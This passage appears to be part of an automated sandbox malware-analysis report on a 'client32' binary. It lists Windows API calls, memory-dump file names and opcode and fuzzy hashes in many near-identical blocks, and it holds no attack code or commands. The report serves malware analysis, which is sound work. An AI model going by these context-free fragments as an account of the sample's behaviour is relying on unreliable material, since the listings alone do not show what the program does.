                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                  • API String ID: 1136984157-1986719024
                                                                                  • Opcode ID: bd8169d8b1d2f1da16aa56a8743fe70e232c658d653b50b5f908e1dbd2e13666
                                                                                  • Instruction ID: 36c1a6ee6805b1b90e48090b7f41ce0c53d42d7852bf61e64861d4a713bbcb04
                                                                                  • Opcode Fuzzy Hash: bd8169d8b1d2f1da16aa56a8743fe70e232c658d653b50b5f908e1dbd2e13666
                                                                                  • Instruction Fuzzy Hash: E3E0867950022DBFC7149E91DC85EAAF35CEB44269F00C135F96656644D674E84087A4
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: EnumExitSleepThreadWindows
                                                                                  • String ID: TapiFix
                                                                                  • API String ID: 1804117399-2824097521
                                                                                  • Opcode ID: 9b936a382379f1639e294998df4fda084f6c97918e753868017fe61e0b06262c
                                                                                  • Instruction ID: 0d22cb111dc1a1c74f2ece42ee292e751dc76676b098746739fa73436add6467
                                                                                  • Opcode Fuzzy Hash: 9b936a382379f1639e294998df4fda084f6c97918e753868017fe61e0b06262c
                                                                                  • Instruction Fuzzy Hash: C7E04838A4167CAFE615DB918D84F56BA989B5535CF810030E4351664597B07940C7A9
APIs
• GetDlgItem.USER32(?,?), ref: 1101D43F
• ShowWindow.USER32(00000000), ref: 1101D446
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ErrorExitItemLastMessageProcessShowWindowwsprintf
• String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
• API String ID: 1319256379-1986719024
• Opcode ID: 8377f77b347f7a331b9e274c23780b90952fd8225b6a3357c05bbe4f1f66010c
• Instruction ID: e0f7042720cd81023d22bad3d6b473d4ff1ed87f82d399384176be7cf1b5ebc2
• Opcode Fuzzy Hash: 8377f77b347f7a331b9e274c23780b90952fd8225b6a3357c05bbe4f1f66010c
• Instruction Fuzzy Hash: D3E04F7594032DBBC7049A95DC89EEAB39CEB54229F008025F92556600E670A84087A0
APIs
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: __flsbuf__flush__getptd_noexit__write_memmove
• String ID:
• API String ID: 2782032738-0
• Opcode ID: 415f7824d5181701451102ec2043120fcf40d14aa730d168d4873098ed8d68d1
• Instruction ID: 2bbfea60a2a12786820c2de27e6caf434d82015e81e2d2deebce7f4ca3d92771
• Opcode Fuzzy Hash: 415f7824d5181701451102ec2043120fcf40d14aa730d168d4873098ed8d68d1
• Instruction Fuzzy Hash: 7541F635A00B05DFDB558F65D94059EFBBEEF803A4F254128D45597240E7F6ED60CB40
APIs
• MessageBeep.USER32(00000000), ref: 1106791B
• MessageBeep.USER32(00000000), ref: 11067957
• MessageBeep.USER32(00000000), ref: 110679AA
• MessageBeep.USER32(00000000), ref: 110679EB
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: BeepMessage
• String ID:
• API String ID: 2359647504-0
• Opcode ID: 7f1ecbc06fcb22de26d86451293ac8fe5d9409e3203d5f6e821324ac06cc55b8
• Instruction ID: 4a014cbc1c5237b7f0567ced4e31e585fd70e1907f22ab32dda50b08ea234cb0
• Opcode Fuzzy Hash: 7f1ecbc06fcb22de26d86451293ac8fe5d9409e3203d5f6e821324ac06cc55b8
• Instruction Fuzzy Hash: 5831C275640610ABE728CF54C882F77B3F8EF84B10F01859AF95687685E3B5E950C3B1
APIs
  • Part of subcall function 11040700: IsWindow.USER32(?), ref: 11040720
  • Part of subcall function 11040700: GetClassNameA.USER32(?,?,00000040), ref: 11040731
• _malloc.LIBCMT ref: 110491DD
• _memmove.LIBCMT ref: 110491EA
• SendMessageTimeoutA.USER32(?,0000004A,0006040E,?,00000002,00001388,?), ref: 11049224
• _free.LIBCMT ref: 1104922B
  • Part of subcall function 11048FE0: wsprintfA.USER32 ref: 11049013
  • Part of subcall function 11048FE0: WaitForInputIdle.USER32(?,00002710), ref: 11049099
  • Part of subcall function 11048FE0: CloseHandle.KERNEL32(?), ref: 110490AC
  • Part of subcall function 11048FE0: CloseHandle.KERNEL32(?), ref: 110490B5
  • Part of subcall function 11048FE0: Sleep.KERNEL32(00000014), ref: 110490D1
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CloseHandle$ClassIdleInputMessageNameSendSleepTimeoutWaitWindow_free_malloc_memmovewsprintf
• String ID:
• API String ID: 176360892-0
• Opcode ID: 46178d18f3e88452c3922ee6de201f6dc9fb41c74dc40f097fdd869246f2e59b
• Instruction ID: d41a6b91d128f2eeea48cc74d118894cce712679c930bdd2d1ac7c58a8e7d684
• Opcode Fuzzy Hash: 46178d18f3e88452c3922ee6de201f6dc9fb41c74dc40f097fdd869246f2e59b
• Instruction Fuzzy Hash: 60316075E0061AABDB04DF94CD81BEEB3B8FF48718F104179E915A7684E731AE05CBA1
APIs
• CreateThread.KERNEL32(00000000,00001000,11027690,00000000,00000000,111EE468), ref: 11029813
• Sleep.KERNEL32(00000032,?,1102B0F3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 11029832
• PostThreadMessageA.USER32(00000000,00000500,00000000,00000000), ref: 11029854
• Sleep.KERNEL32(00000032,?,1102B0F3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 1102985C
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: SleepThread$CreateMessagePost
• String ID:
• API String ID: 3347742789-0
• Opcode ID: fda338b6a51c78fe6c2f886b68065117b2ed91385ddfdaae507fd395cc0aabb8
• Instruction ID: 2ae3116f5df8233203c0b5b7c047d092e18a9fbb085bfb1a1d8cc4b180184980
• Opcode Fuzzy Hash: fda338b6a51c78fe6c2f886b68065117b2ed91385ddfdaae507fd395cc0aabb8
• Instruction Fuzzy Hash: F331C576E43232EBE212DBD9CC80FB6B798A745B68F514135F928972C8D2706841CFD0
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 111797A9
• __isleadbyte_l.LIBCMT ref: 111797DC
• MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036AD0,00BFBBEF,00000000,?,?,?,1117A3D8,00000109,00BFBBEF,00000003), ref: 1117980D
• MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,1117A3D8,00000109,00BFBBEF,00000003), ref: 1117987B
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
• Opcode ID: 8a143442f0c1ddc808179669c8bda0f547e04561d024046af250b3c99ddd2ce0
• Instruction ID: dd7da2bd4d1e27f38930cbdbffb8ca2b0741d821671db88b966082c1cf8912a5
• Opcode Fuzzy Hash: 8a143442f0c1ddc808179669c8bda0f547e04561d024046af250b3c99ddd2ce0
• Instruction Fuzzy Hash: 1331AE31A0029EEFEB01DF64C9849AEFFA6EF01330F1585A9E4648B290F730D954CB51
APIs
• EnterCriticalSection.KERNEL32(0000002C,50D94AA1,?,?,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE10,?,?,?,00000000), ref: 110B372F
• LeaveCriticalSection.KERNEL32(0000002C,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE10,?,?,?,00000000), ref: 110B376F
• SetEvent.KERNEL32(?), ref: 110B37EA
• LeaveCriticalSection.KERNEL32(0000002C), ref: 110B37F1
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$Leave$EnterEvent
                                                                                  • String ID:
                                                                                  • API String ID: 3394196147-0
                                                                                  • Opcode ID: 41462067ee8128c784213e06cad4e855516fce30d8963978b3823cfd81d7b6d6
                                                                                  • Instruction ID: 8acebb29280036c6a802c58c088d91b2f5c0a2bed23f5f36a778171c733041f7
                                                                                  • Opcode Fuzzy Hash: 41462067ee8128c784213e06cad4e855516fce30d8963978b3823cfd81d7b6d6
                                                                                  • Instruction Fuzzy Hash: BC314A75A44B059FD325CF69C980B9AFBE4FB48314F10862EE85AC7B50EB34A850CB90
                                                                                  APIs
                                                                                    • Part of subcall function 110684E0: EnterCriticalSection.KERNEL32(?,50D94AA1,00000000,00002710,00000001,11027140,50D94AA1,00000000,00002710,?,?,00000000,11182BE8,000000FF,?,110294CE), ref: 1106858A
                                                                                  • SendMessageA.USER32(?,000006D4,00000000,00000000), ref: 110436CA
                                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 110436D1
                                                                                  • IsWindow.USER32(00000000), ref: 110436DE
                                                                                  • GetWindowRect.USER32(00000000,1104A5A0), ref: 110436F5
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Window$CriticalEnterLongMessageRectSectionSend
                                                                                  • String ID:
                                                                                  • API String ID: 3558565530-0
                                                                                  • Opcode ID: 7a348eb1ebbebf4d087ed6f90251ea71c232aa61dd705a63114693f89344e778
                                                                                  • Instruction ID: d8135c0911b88fc1f510a9c52ef20d21577c3519517ef8ed33f3b43d0edb38f0
                                                                                  • Opcode Fuzzy Hash: 7a348eb1ebbebf4d087ed6f90251ea71c232aa61dd705a63114693f89344e778
                                                                                  • Instruction Fuzzy Hash: 3121A276E45259ABD714CF94DA80B9DF7B8FB45724F204269E82597780DB30A900CB54
                                                                                  APIs
                                                                                  • SetBkColor.GDI32(?,?), ref: 11143091
                                                                                  • SetRect.USER32(?,?,?,?,?), ref: 111430A9
                                                                                  • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 111430C0
                                                                                  • SetBkColor.GDI32(?,00000000), ref: 111430C8
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Color$RectText
                                                                                  • String ID:
                                                                                  • API String ID: 4034337308-0
                                                                                  • Opcode ID: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
                                                                                  • Instruction ID: e9225e88152d902865c43eb673e3150d6d7e7d22167fd17714d79550e5345a2a
                                                                                  • Opcode Fuzzy Hash: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
                                                                                  • Instruction Fuzzy Hash: 0C012C7264021CBBDB04DEA8DD81FEFB3ACEF49604F104159FA15A7280DAB0AD018BA5
                                                                                  APIs
                                                                                  • SetEvent.KERNEL32 ref: 110675BB
                                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 110675EC
                                                                                  • DispatchMessageA.USER32(?), ref: 110675F6
                                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 11067604
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$Peek$DispatchEvent
                                                                                  • String ID:
                                                                                  • API String ID: 4257095537-0
                                                                                  • Opcode ID: 3db10011ce53d706413e1f321e5ef86fa62babbb723f360e03787fab8b25e9f7
                                                                                  • Instruction ID: aec9ad63bee144445ad482119ba180fbd35a23c038e7556534d76a428b5108da
                                                                                  • Opcode Fuzzy Hash: 3db10011ce53d706413e1f321e5ef86fa62babbb723f360e03787fab8b25e9f7
                                                                                  • Instruction Fuzzy Hash: E701B171A40205ABE704DE94CC81F96B7ADAB88714F5001A5FA14AF1C5EBB5A541CBF0
                                                                                  APIs
                                                                                  • GlobalDeleteAtom.KERNEL32(00000000), ref: 1115F208
                                                                                  • GlobalDeleteAtom.KERNEL32 ref: 1115F212
                                                                                  • GlobalDeleteAtom.KERNEL32 ref: 1115F21C
                                                                                  • SetWindowLongA.USER32(?,000000FC,?), ref: 1115F22C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
